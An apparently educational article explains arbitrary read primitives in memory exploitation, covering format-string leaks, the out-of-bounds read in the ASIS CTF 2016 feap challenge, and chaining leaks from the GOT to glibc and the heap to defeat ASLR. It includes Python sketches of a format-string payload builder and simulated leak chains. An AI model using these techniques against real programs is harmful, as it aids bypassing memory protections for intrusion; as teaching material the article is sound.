Arbitrary read primitives

An arbitrary read primitive is a condition in which an attacker can read any location within a process's virtual memory. The closest formal definition in the Common Weakness Enumeration (CWE) list is Untrusted Pointer Dereference (CWE-822). It describes a program that dereferences whatever pointer value it is given, whether that value comes from a trusted or an untrusted source. The condition becomes useful to an attacker when the program also prints, or otherwise returns, the contents at the supplied pointer. Below are some examples of how an attacker can implement or make use of an arbitrary read primitive present within a program.

Use of Externally-Controlled Format String

As in our Arbitrary write primitives discussion, a format string vulnerability is not a condition that an attacker implements; it is simply present because of programmer error. Given the right conditions, however, it still lets an attacker read memory from any location in the process.

As before, the attacker can include an address in their forged format string so that the address is placed onto the stack for the vulnerable printf() call, and they must know the offset of that address on the stack at the time of the call. Unlike before, the attacker uses different conversion specifiers, because the goal is to print memory rather than write to it. Note that p and x print the stack value itself, while s treats the stack value as a pointer and prints the string it points to, so s is the specifier that actually reads the contents of a placed address. The conversion specifiers attackers most commonly use to dump information from memory are:

  • p - void*
  • x - unsigned int
  • s - null terminated string
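A minimal sketch of how such a payload might be assembled, assuming a 32-bit little-endian target and a printf() that supports POSIX positional arguments (%N$s). The function name build_read_payload, the target address, and the stack offset of 7 are all hypothetical values chosen for illustration; in practice the offset has to be discovered for each vulnerable call.

```python
import struct


def build_read_payload(target_addr: int, stack_offset: int) -> bytes:
    """Build a format string that asks printf() to print the string at target_addr.

    Assumes a 32-bit little-endian process in which the start of the
    attacker's buffer is the stack_offset-th printf() argument.
    """
    if not 0 <= target_addr <= 0xFFFFFFFF:
        raise ValueError("target_addr must fit in 32 bits")
    addr_bytes = struct.pack("<I", target_addr)
    if b"\x00" in addr_bytes:
        # printf() stops parsing the format string at the first NUL byte,
        # so the specifier placed after the address would never be reached.
        raise ValueError("address contains a NUL byte")
    # The address is placed first; %<offset>$s then dereferences it.
    return addr_bytes + f"%{stack_offset}$s".encode("ascii")


# Hypothetical target address and stack offset.
payload = build_read_payload(0x0804A010, 7)
print(payload)
```

On 64-bit targets, user-space addresses normally contain NUL bytes, so the address is usually placed after the specifier instead and the offset adjusted to match; the sketch rejects such addresses rather than handling that case.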

Use of Out-of-range Pointer Offset

This particular condition (CWE-823) is a child of Improper Restriction of Operations within the Bounds of a Memory Buffer (CWE-119); however, I feel it is the more applicable entry for this discussion of arbitrary read primitives. The most important part of its Extended Description is the statement:

If an attacker can control or influence the offset so that it points outside of the intended boundaries of the structure, then the attacker may be able to read or write to memory locations that are used elsewhere in the program.

For our discussion, we're interested in implementing an arbitrary read primitive using the condition described above. A good example is the feap challenge from ASIS CTF Quals 2016. The arbitrary read primitive for this challenge exists in the print_note function of the vulnerable executable. print_note performs no bounds checking when indexing into the notes array, so the attacker can supply indices that fall outside the array. The program then treats whatever lies at those out-of-bounds locations as note structures and calls printf() on what it believes to be a note's title attribute.

Coincidentally, the note_sizes array resides directly below the notes array that the attacker is able to read past. The attacker can forge a valid pointer inside note_sizes by creating a note of a particular size: the target address minus 0x40 (to account for the bytes the program adds to the size). The attacker then indexes past the end of the notes array, and the program, believing the forged value to be a pointer to a valid note struct, calls printf() on the memory it points to. This condition gives the attacker the ability to implement an arbitrary read primitive in this CTF challenge.
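The mechanics can be illustrated with a toy model in Python. This is a simulation under simplifying assumptions, not the challenge binary: the addresses, array length, and helper names are hypothetical, and the forged pointer is treated as pointing directly at a string rather than at a full note struct. Only the 0x40 adjustment and the adjacency of notes and note_sizes come from the description above.

```python
import struct

# Toy process memory. All addresses and sizes here are hypothetical.
memory = bytearray(0x4000)

NOTES_BASE = 0x1000                       # notes[]: array of 8-byte pointers
NOTES_LEN = 4
SIZES_BASE = NOTES_BASE + NOTES_LEN * 8   # note_sizes[] sits right after notes[]
PADDING = 0x40                            # bytes the program adds to a requested size


def write_qword(addr: int, value: int) -> None:
    struct.pack_into("<Q", memory, addr, value)


def read_qword(addr: int) -> int:
    return struct.unpack_from("<Q", memory, addr)[0]


def read_cstring(addr: int) -> bytes:
    end = memory.index(b"\x00", addr)
    return bytes(memory[addr:end])


def create_note(slot: int, requested_size: int) -> None:
    # The program records the padded size in note_sizes[slot].
    write_qword(SIZES_BASE + slot * 8, requested_size + PADDING)


def print_note(index: int) -> bytes:
    # Vulnerable: index is never checked against NOTES_LEN.
    note_ptr = read_qword(NOTES_BASE + index * 8)
    return read_cstring(note_ptr)


# Data the attacker wants to read, at a hypothetical address.
SECRET_ADDR = 0x3000
memory[SECRET_ADDR:SECRET_ADDR + 7] = b"s3cr3t\x00"

# Forge a pointer in note_sizes[0] by requesting size = target - 0x40 ...
create_note(0, SECRET_ADDR - PADDING)
# ... then index one element past the end of notes[], landing on note_sizes[0].
leak = print_note(NOTES_LEN)
print(leak)
```

The out-of-range index NOTES_LEN resolves to the first entry of note_sizes, which the attacker set to the target address by choosing the note size.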

So what are arbitrary read primitives good for?

Attackers most commonly use arbitrary read primitives to leak sensitive program information, allowing them to bypass mitigations such as ASLR, PIE, stack canaries, and possibly even pointer mangling. If the attacker can read arbitrary data from the stack, they will most likely be able to expose glibc pointers, program pointers, or return addresses stored there, allowing them to calculate the base addresses of the glibc and program segments in the process's virtual memory mapping. Attackers are also interested in leaking heap pointers in order to derive the base of the heap in memory, especially if their method of gaining code execution is a heap memory corruption vulnerability.
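The base calculation itself is a single subtraction, sketched below. The leaked address and the offset are hypothetical; a real offset depends on the exact glibc or program build in use. The page-alignment check is an added sanity test, on the assumption that segment bases are page aligned.

```python
PAGE_SIZE = 0x1000


def base_from_leak(leaked_addr: int, known_offset: int) -> int:
    """Derive a segment base from one leaked pointer.

    known_offset is the distance from the segment base to the leaked
    location, taken from the matching glibc or program binary.
    """
    base = leaked_addr - known_offset
    if base % PAGE_SIZE != 0:
        # A misaligned result usually means the wrong offset or the
        # wrong library version was assumed.
        raise ValueError(f"computed base {base:#x} is not page aligned")
    return base


# Hypothetical values: a pointer leaked from the stack and its offset in glibc.
leaked_return_addr = 0x7F3A1C2A0E50
offset_in_libc = 0x80E50
libc_base = base_from_leak(leaked_return_addr, offset_in_libc)
print(hex(libc_base))
```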

Conclusion

An arbitrary read primitive is only useful if an attacker knows what information they want and where to get it. Attackers must also know how to use an initial exposure to guide succeeding exposures: you won't always know the exact address of your arbitrary read target, and you might need to expose the contents of other data structures in memory in order to find it.

Take, for example, a vulnerable non-PIE binary in which an attacker can implement an arbitrary read primitive. The attacker doesn't know where the stack is, but they do know the location of the Global Offset Table (GOT). Reading the GOT entry of any function that has already been called, and whose glibc address has therefore been resolved, lets the attacker derive the base of glibc in process memory. With the base of glibc known, an attacker who wishes to locate the heap can target the main_arena in glibc. Using the main_arena, the attacker can leak the location of one of the bins, allowing them to derive the base of the heap in memory. The usefulness of an arbitrary read primitive relies on its user's understanding of the state of the process when the primitive is implemented and on the user's knowledge of where important data structures are stored in process memory.
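The chain described above can be sketched as two dependent reads. The read primitive is modeled as a callable that returns the 8-byte value at an address, and a dictionary stands in for process memory so the logic can be checked. Every address and offset below is hypothetical, since the real ones depend on the binary and the glibc build, and the sketch assumes the chosen bin currently holds a heap chunk (an empty bin points back into main_arena rather than into the heap).

```python
from typing import Callable, Tuple

# Hypothetical layout values for illustration only.
GOT_ENTRY = 0x601018           # GOT slot of an already-resolved function (non-PIE)
FUNC_OFFSET = 0x6F690          # that function's offset inside glibc
MAIN_ARENA_OFFSET = 0x3C4B20   # main_arena's offset inside glibc
BIN_FIELD_OFFSET = 0x58        # offset of a bin pointer inside main_arena
CHUNK_OFFSET_IN_HEAP = 0x10    # distance of the leaked chunk from the heap base


def locate_bases(read_qword: Callable[[int], int]) -> Tuple[int, int]:
    """Use an arbitrary read to find the glibc base, then the heap base."""
    # Step 1: a known address (the GOT) reveals a glibc pointer.
    libc_base = read_qword(GOT_ENTRY) - FUNC_OFFSET
    # Step 2: the glibc base tells us where main_arena is, which
    # in turn holds a pointer into the heap.
    heap_ptr = read_qword(libc_base + MAIN_ARENA_OFFSET + BIN_FIELD_OFFSET)
    heap_base = heap_ptr - CHUNK_OFFSET_IN_HEAP
    return libc_base, heap_base


# Simulated process memory standing in for the real read primitive.
TRUE_LIBC_BASE = 0x7F1234500000
TRUE_HEAP_BASE = 0x01C3A000
fake_memory = {
    GOT_ENTRY: TRUE_LIBC_BASE + FUNC_OFFSET,
    TRUE_LIBC_BASE + MAIN_ARENA_OFFSET + BIN_FIELD_OFFSET:
        TRUE_HEAP_BASE + CHUNK_OFFSET_IN_HEAP,
}

libc_base, heap_base = locate_bases(fake_memory.__getitem__)
print(hex(libc_base), hex(heap_base))
```

The second read cannot be issued until the first has been interpreted, which is the sense in which an initial exposure guides the ones that follow.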

References

  1. https://cwe.mitre.org/data/definitions/822.html
  2. https://cwe.mitre.org/data/definitions/134.html
  3. Arbitrary write primitives
  4. https://cwe.mitre.org/data/definitions/823.html
  5. https://ctftime.org/task/2370